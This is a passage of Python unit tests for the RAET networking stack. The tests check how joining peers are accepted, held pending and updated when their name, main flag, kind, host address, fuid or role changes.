self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Mode: Always
alpha.keep.auto = raeting.AutoMode.always.value
# Mutable: Yes
alpha.mutable = True
# Name: Either
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Old
# Keys: New
beta.local.signer = nacling.Signer()
beta.local.priver = nacling.Privateer()
beta.dumpLocalRole()
# Sameness: Not SameAll, Not Same Role/Keys
keep = self.copyData(alphaRemote)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
# Assert alphaRemote is modified
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertFalse(self.sameRoleKeys(alphaRemote, keep))
self.assertEqual(alphaRemote.verfer.keyhex, beta.local.signer.verhex)
self.assertEqual(alphaRemote.pubber.keyhex, beta.local.priver.pubhex)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 2)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 2)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentNonVacuousAcceptSameAll(self):
'''
Test joinent accept non-vacuous same all join (L1)
'''
console.terse("{0}\n".format(self.testJoinentNonVacuousAcceptSameAll.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always (Use never as most strict)
# Vacuous: No
# Ephemeral: No Nuid (the Nuid is known)
# Perform an auto-accepted join
alpha, beta = self.bootstrapJoinedRemotes()
alphaRemote = alpha.remotes.values()[0]
betaRemote = beta.remotes.values()[0]
# Mutable: Either (use No as more strict)
self.assertIs(alpha.mutable, None)
alpha.keep.auto = raeting.AutoMode.never.value
# Name: Old
# Main: Old
# Kind: Old
# RHA: Old
# Nuid: Old
# Fuid: Old
# Leid: Old
# Reid: Old
# Role: Old
# Keys: Old
# Sameness: SameAll
keep = self.copyData(alphaRemote)
# Ensure remote role is accepted
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Accept, No change
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
# Assert alphaRemote isn't modified
self.assertTrue(self.sameAll(alphaRemote, keep))
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 2)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 2)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentNonVacuousPendingPendNewName(self):
'''
Test mutable joinent pend non-vacuous join with an updated name (M1)
'''
console.terse("{0}\n".format(self.testJoinentNonVacuousPendingPendNewName.__doc__))
# Status: Pending
# Mode: Never
alpha, beta = self.bootstrapStacks()
alpha.keep.auto = raeting.AutoMode.never.value
# Mutable: Yes
alpha.mutable = True
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha)
# Ephemeral: No Nuid (the Nuid is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
alpha.keep.pendRemote(alphaRemote)
# Ensure remote status is Pending
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Name: New
oldName = beta.name
newName = '{0}_new'.format(oldName)
beta.name = newName
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Pend, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 1)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
# Assert alphaRemote is modified
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
self.assertEqual(alphaRemote.name, newName)
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.pending.value)
self.assertIs(betaRemote.acceptance, None)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(oldName)
self.assertIs(remoteData, None)
remoteData = alpha.keep.loadRemoteData(newName)
self.assertIsNot(remoteData, None)
self.assertEqual(remoteData['name'], beta.name) # new value
self.assertEqual(remoteData['role'], beta.local.role)
self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(remoteData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(remoteData['pubhex']), beta.local.priver.pubhex)
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Allow beta to modify it's remote estate: set proper name and role for alpha remote estate on accept
beta.mutable = True
# Accept the transaction
alpha.keep.acceptRemote(alphaRemote)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
self.assertTrue(stack.mutable)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(oldName)
self.assertIs(remoteData, None)
remoteData = alpha.keep.loadRemoteData(newName)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentNonVacuousPendingPendNewMain(self):
'''
Test mutable joinent pend non-vacuous join with an updated main (M2)
'''
console.terse("{0}\n".format(self.testJoinentNonVacuousImmutableRejectNewMain.__doc__))
# Status: Pending
# Mode: Never
alpha, beta = self.bootstrapStacks()
alpha.keep.auto = raeting.AutoMode.never.value
# Mutable: Yes
alpha.mutable = True
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha)
# Ephemeral: No Nuid (the Nuid is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
alpha.keep.pendRemote(alphaRemote)
# Ensure remote status is Pending
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Name: Either
# Main: New
oldMain = None
newMain = True
self.assertIs(beta.main, oldMain)
beta.main = newMain
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Pend, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 1)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
# Assert alphaRemote is modified
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
self.assertEqual(alphaRemote.main, newMain)
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.pending.value)
self.assertIs(betaRemote.acceptance, None)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIsNot(remoteData, None)
self.assertEqual(remoteData['main'], beta.main) # new value
self.assertEqual(remoteData['role'], beta.local.role)
self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(remoteData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(remoteData['pubhex']), beta.local.priver.pubhex)
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Allow beta to modify it's remote estate: set proper name and role for alpha remote estate on accept
beta.mutable = True
# Accept the transaction
alpha.keep.acceptRemote(alphaRemote)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
self.assertTrue(stack.mutable)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentNonVacuousPendingPendNewKind(self):
'''
Test mutable joinent pend non-vacuous join with an updated kind (M3)
'''
console.terse("{0}\n".format(self.testJoinentNonVacuousPendingPendNewKind.__doc__))
# Status: Pending
# Mode: Never
alpha, beta = self.bootstrapStacks()
alpha.keep.auto = raeting.AutoMode.never.value
# Mutable: Yes
alpha.mutable = True
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha)
# Ephemeral: No Nuid (the Nuid is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
alpha.keep.pendRemote(alphaRemote)
# Ensure remote status is Pending
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Name: Either
# Main: Either
# Kind: New
oldKind = beta.kind
newKind = 33
self.assertNotEqual(oldKind, newKind)
beta.kind = newKind
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Pend, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 1)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
# Assert alphaRemote is modified
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
self.assertEqual(alphaRemote.kind, newKind)
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.pending.value)
self.assertIs(betaRemote.acceptance, None)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIsNot(remoteData, None)
self.assertEqual(remoteData['kind'], beta.kind) # new value
self.assertEqual(remoteData['role'], beta.local.role)
self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(remoteData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(remoteData['pubhex']), beta.local.priver.pubhex)
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Allow beta to modify it's remote estate: set proper name and role for alpha remote estate on accept
beta.mutable = True
# Accept the transaction
alpha.keep.acceptRemote(alphaRemote)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
self.assertTrue(stack.mutable)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentNonVacuousPendingPendNewRha(self):
'''
Test mutable joinent pend non-vacuous join with an updated remote host address (M4)
'''
console.terse("{0}\n".format(self.testJoinentNonVacuousPendingPendNewRha.__doc__))
# Status: Pending
# Mode: Never
alpha, beta = self.bootstrapStacks()
alpha.keep.auto = raeting.AutoMode.never.value
# Mutable: Yes
alpha.mutable = True
# Simulate: alpha already know beta with ha=('127.0.0.1', 7532)
# beta connects with ha=('127.0.0.1', 7531)
oldHa = (beta.local.ha[0], 7532)
newHa = (beta.local.ha[0], beta.local.ha[1])
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha)
# Ephemeral: No Nuid (the Nuid is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=oldHa,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
alpha.keep.pendRemote(alphaRemote)
# Ensure remote status is Pending
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Name: Either
# Main: Either
# Appl: Either
# RHA: New: alpha remote ha is set to (127.0.0.1, 7532),
# new ha received from beta is (127.0.0.1, 7531)
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
self.assertEqual(alphaRemote.ha, oldHa)
self.assertEqual(beta.local.ha, newHa)
keep = self.copyData(alphaRemote)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Pend, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 1)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
# Assert alphaRemote is modified
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
self.assertEqual(alphaRemote.ha, newHa)
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.pending.value)
self.assertIs(betaRemote.acceptance, None)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIsNot(remoteData, None)
self.assertEqual(tuple(remoteData['ha']), beta.local.ha) # new value
self.assertEqual(remoteData['role'], beta.local.role)
self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Allow beta to modify it's remote estate: set proper name and role for alpha remote estate on accept
beta.mutable = True
# Accept the transaction
alpha.keep.acceptRemote(alphaRemote)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
self.assertTrue(stack.mutable)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentNonVacuousPendingPendNewFuid(self):
'''
Test mutable joinent pend non-vacuous join with an updated fuid (M5)
'''
console.terse("{0}\n".format(self.testJoinentNonVacuousPendingPendNewFuid.__doc__))
# Status: Pending
# Mode: Never
alpha, beta = self.bootstrapStacks()
alpha.keep.auto = raeting.AutoMode.never.value
# Mutable: Yes
alpha.mutable = True
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha)
# Simulate: alpha already know beta with fuid=33
# beta connects with a new fuid=newFuid
oldFuid = 33
newFuid = betaRemote.nuid
# Ephemeral: No Nuid (the Nuid is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=oldFuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
alpha.keep.pendRemote(alphaRemote)
# Ensure remote status is Pending
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Name: Either
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: New: alphaRemote has uid=33 that is 'old', betaRemote has uid=2
# Leid: Old
# Reid: New
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Pend, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 1)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
# Assert alphaRemote is modified
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
self.assertEqual(alphaRemote.fuid, newFuid)
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.pending.value)
self.assertIs(betaRemote.acceptance, None)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIsNot(remoteData, None)
self.assertEqual(remoteData['fuid'], betaRemote.nuid) # new value
self.assertEqual(remoteData['role'], beta.local.role)
self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(remoteData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(remoteData['pubhex']), beta.local.priver.pubhex)
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Allow beta to modify it's remote estate: set proper name and role for alpha remote estate on accept
beta.mutable = True
# Accept the transaction
alpha.keep.acceptRemote(alphaRemote)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
self.assertTrue(stack.mutable)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentNonVacuousPendingPendNewRole(self):
'''
Test mutable joinent pend non-vacuous join with an updated role (M6)
'''
console.terse("{0}\n".format(self.testJoinentNonVacuousPendingPendNewRole.__doc__))
# Status: Pending
# Mode: Never
alpha, beta = self.bootstrapStacks()
alpha.keep.auto = raeting.AutoMode.never.value
# Mutable: Yes
alpha.mutable = True
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha)
# Ephemeral: No Nuid (the Nuid is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
alpha.keep.pendRemote(alphaRemote)
oldRole = 'beta'
newRole = 'beta_new'
# Name: Either
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: New
self.assertIs(beta.local.role, oldRole)
beta.local.role = newRole
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Ensure remote status is Pending
roleData = alpha.keep.loadRemoteRoleData(oldRole)
self.assertEqual(roleData['role'], oldRole)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Ensure alpha knows nothing about the new role
roleData = alpha.keep.loadRemoteRoleData(newRole)
self.assertEqual(roleData['role'], newRole)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Pend, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 1)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
# Assert alphaRemote is modified
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertFalse(self.sameRoleKeys(alphaRemote, keep))
self.assertEqual(alphaRemote.role, newRole)
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.pending.value)
self.assertIs(betaRemote.acceptance, None)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIsNot(remoteData, None)
self.assertEqual(remoteData['role'], beta.local.role)
self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
